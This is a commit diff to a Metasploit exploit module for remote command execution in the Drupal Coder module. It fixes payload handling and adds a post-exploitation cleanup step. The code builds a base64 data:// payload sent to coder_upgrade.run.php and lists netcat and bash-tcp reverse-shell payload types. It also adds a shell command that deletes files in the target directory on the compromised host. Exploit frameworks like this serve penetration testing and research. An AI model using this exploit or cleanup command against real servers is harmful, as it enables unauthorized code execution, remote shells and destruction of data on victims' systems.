Land rapid7#7215, Fix drupal_coder_exec bugs rapid7#7215

wwebb-r7 · wwebb-r7 · commit 3eb3c5afa2be · 2016-08-18T13:43:23.000-05:00
diff --git a/modules/exploits/unix/webapp/drupal_coder_exec.rb b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -43,7 +43,7 @@ def initialize(info={})
           'Compat'      =>
             {
               'PayloadType' => 'cmd cmd_bash',
-              'RequiredCmd' => 'netcat netcat-e bash-tcp'
+              'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
             },
         },
       'Platform'       => ['unix'],
@@ -87,15 +87,23 @@ def exploit
     p << payload.encoded
     p << ' #";s:4:"name";s:4:"test";}}}'
 
-    payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
+    pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
 
     send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
       'encode_params' => false,
       'vars_get' => {
-        'file' => payload
+        'file' => pl
       }
     )
   end
+
+  # XXX: FileDropper can't handle weird filenames
+  def on_new_session(session)
+    # This find command should be decently portable...
+    command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
+    print_status("Cleaning up: #{command}")
+    session.shell_command_token(command)
+  end
 end
